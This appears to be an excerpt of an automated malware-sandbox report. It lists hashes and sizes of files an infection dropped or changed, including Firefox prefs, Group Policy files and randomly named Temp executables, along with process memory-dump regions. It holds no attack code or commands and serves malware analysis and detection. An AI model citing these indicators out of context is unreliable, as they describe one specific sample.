                                                                                                                                                                    MD5

                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                    SHA256

                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                    SHA512

                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2vpmaw3i.default-release\prefs.js

                                                                                                                                                                    Filesize

                                                                                                                                                                    7KB

                                                                                                                                                                    MD5

                                                                                                                                                                    af7cd42f8140652d5b444364f658f2ff

                                                                                                                                                                    SHA1

                                                                                                                                                                    6d7a2e71e3c4afec946341a129233c9c96662277

                                                                                                                                                                    SHA256

                                                                                                                                                                    9f53d67859510defc687c9e0ea1b6e99b2d36fa69ef0e29ab227a7d107c89717

                                                                                                                                                                    SHA512

                                                                                                                                                                    646552d276621abdd4e5ba6ce6a4d3b91019f345ad090b99e200a3de7b401f13a2b5fd890c902d3174bc5735a9ce3f8ad6c592e9efe5ecbcfa859497272d7e17

                                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                                    SHA1

                                                                                                                                                                    36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                                    SHA256

                                                                                                                                                                    b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                                    SHA512

                                                                                                                                                                    676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Filesize

                                                                                                                                                                    11KB

                                                                                                                                                                    MD5

                                                                                                                                                                    fab60c0a11b4a74ed52953b51225aa51

                                                                                                                                                                    SHA1

                                                                                                                                                                    5a2bbaf9168f2a0f95caacacb538eb6b7c84138d

                                                                                                                                                                    SHA256

                                                                                                                                                                    3fae5cafd73a6c07898233fff336f37c15999e2c14e1852db2606d0283c0bc63

                                                                                                                                                                    SHA512

                                                                                                                                                                    5e77ba8c8e5bbfb1252ae2da25b3bb1025982b95849bd9af8c7bd7a5b4a7583a02a31b7ae21f15ac6bd34f000cc5149796b44da918ec5c0ef24c24a2a50afd46

                                                                                                                                                                  • C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    9fb528065da88932f735573ea50ce98f

                                                                                                                                                                    SHA1

                                                                                                                                                                    43224413e8c10b4c2ba77fd42380b3f4e37c1006

                                                                                                                                                                    SHA256

                                                                                                                                                                    2d7852281ca98ca615db32e6b54a6800a33a058c259f37db0eefdf99b543898a

                                                                                                                                                                    SHA512

                                                                                                                                                                    e1f1fb46cae8b28b95ec03b3552fdd52f2b675d4901f4b03f7238960b12eeec97acf9b48ba7f813c1def2e4de45f28b75291d5a911c4946fbea16af82e361171

                                                                                                                                                                  • C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    9fb528065da88932f735573ea50ce98f

                                                                                                                                                                    SHA1

                                                                                                                                                                    43224413e8c10b4c2ba77fd42380b3f4e37c1006

                                                                                                                                                                    SHA256

                                                                                                                                                                    2d7852281ca98ca615db32e6b54a6800a33a058c259f37db0eefdf99b543898a

                                                                                                                                                                    SHA512

                                                                                                                                                                    e1f1fb46cae8b28b95ec03b3552fdd52f2b675d4901f4b03f7238960b12eeec97acf9b48ba7f813c1def2e4de45f28b75291d5a911c4946fbea16af82e361171

                                                                                                                                                                  • C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    8d977388d6dd1afff73b2470abd0b32f

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c46d839fcb89f342887c71d1d0fecfdd71b4dc8

                                                                                                                                                                    SHA256

                                                                                                                                                                    b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b

                                                                                                                                                                    SHA512

                                                                                                                                                                    4169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced

                                                                                                                                                                  • C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    8d977388d6dd1afff73b2470abd0b32f

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c46d839fcb89f342887c71d1d0fecfdd71b4dc8

                                                                                                                                                                    SHA256

                                                                                                                                                                    b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b

                                                                                                                                                                    SHA512

                                                                                                                                                                    4169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced

                                                                                                                                                                  • C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    8d977388d6dd1afff73b2470abd0b32f

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c46d839fcb89f342887c71d1d0fecfdd71b4dc8

                                                                                                                                                                    SHA256

                                                                                                                                                                    b87a7fe530c88043902423e9a7143a0d98aea9217712c3f8125da4e64552d13b

                                                                                                                                                                    SHA512

                                                                                                                                                                    4169c575067c2be67804026d909eded4d7358f0c898f4117500b9357ce7c576b105af718b3b80ba73443d0a7213a9acc197339b2c65e6e848b19d2f851009ced

                                                                                                                                                                  • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    84b867fa1b7b64eb8fcbbce96f2b3682

                                                                                                                                                                    SHA1

                                                                                                                                                                    98c6cf2f0073bd95c0fc4e4f5b76a04c10deee99

                                                                                                                                                                    SHA256

                                                                                                                                                                    48ce24736557a7919d92511c47db486571bfc8329589246de3779da88738b7fb

                                                                                                                                                                    SHA512

                                                                                                                                                                    bb4df51d4e394e8663f02e0a828b3a94d8a1d96fb2d9ec16a38b467e1a3f977387f2763e8a30de7bc5f6d5601f82793e7bcda11cb5f0882907c7466d37ab8b7f

                                                                                                                                                                  • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                                    Filesize

                                                                                                                                                                    268B

                                                                                                                                                                    MD5

                                                                                                                                                                    a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                                    SHA1

                                                                                                                                                                    1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                                    SHA256

                                                                                                                                                                    9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                                    SHA512

                                                                                                                                                                    9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                                  • memory/1156-516-0x0000000001350000-0x00000000018E2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.6MB

                                                                                                                                                                  • memory/1276-120-0x0000000001F60000-0x0000000001FE5000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    532KB

                                                                                                                                                                  • memory/1276-162-0x0000000003030000-0x0000000003093000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    396KB

                                                                                                                                                                  • memory/1276-108-0x0000000010000000-0x0000000010592000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.6MB

                                                                                                                                                                  • memory/1276-507-0x00000000039B0000-0x0000000003A6D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    756KB

                                                                                                                                                                  • memory/1276-569-0x00000000007F0000-0x0000000000EDD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/1276-107-0x00000000007F0000-0x0000000000EDD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/1276-492-0x00000000030A0000-0x0000000003116000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    472KB

                                                                                                                                                                  • memory/1648-38-0x0000000000540000-0x0000000000C2D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/1648-69-0x0000000000540000-0x0000000000C2D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/1648-39-0x0000000010000000-0x0000000010592000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.6MB

                                                                                                                                                                  • memory/1648-111-0x0000000000540000-0x0000000000C2D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/3844-67-0x0000000073720000-0x0000000073ED0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/3844-68-0x0000000001690000-0x00000000016A0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/3844-82-0x0000000073720000-0x0000000073ED0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/3844-81-0x0000000001690000-0x00000000016A0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4076-17-0x00007FFAC4660000-0x00007FFAC5121000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/4076-24-0x00000251432C0000-0x00000251432E2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/4076-18-0x0000025143300000-0x0000025143310000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4076-23-0x0000025143300000-0x0000025143310000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4076-31-0x00007FFAC4660000-0x00007FFAC5121000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/4408-102-0x00007FFAC39A0000-0x00007FFAC4461000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/4408-100-0x00000286B8D00000-0x00000286B8D10000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4408-88-0x00000286B8D00000-0x00000286B8D10000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4408-89-0x00000286B8D00000-0x00000286B8D10000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4408-87-0x00007FFAC39A0000-0x00007FFAC4461000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/4604-48-0x00000000041F0000-0x0000000004256000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/4604-59-0x0000000004440000-0x0000000004794000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    3.3MB

                                                                                                                                                                  • memory/4604-43-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4604-44-0x0000000001010000-0x0000000001046000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    216KB

                                                                                                                                                                  • memory/4604-65-0x0000000073720000-0x0000000073ED0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4604-45-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4604-46-0x00000000039F0000-0x0000000004018000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.2MB

                                                                                                                                                                  • memory/4604-47-0x0000000004090000-0x00000000040B2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/4604-49-0x00000000042D0000-0x0000000004336000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/4604-42-0x0000000073720000-0x0000000073ED0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4604-60-0x0000000004900000-0x000000000491E000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    120KB

                                                                                                                                                                  • memory/4604-61-0x0000000004940000-0x000000000498C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    304KB

                                                                                                                                                                  • memory/4604-62-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4740-12-0x0000000010000000-0x0000000010592000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.6MB

                                                                                                                                                                  • memory/4740-11-0x00000000009F0000-0x00000000010DD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/4740-566-0x00000000009F0000-0x00000000010DD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/4740-32-0x00000000009F0000-0x00000000010DD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB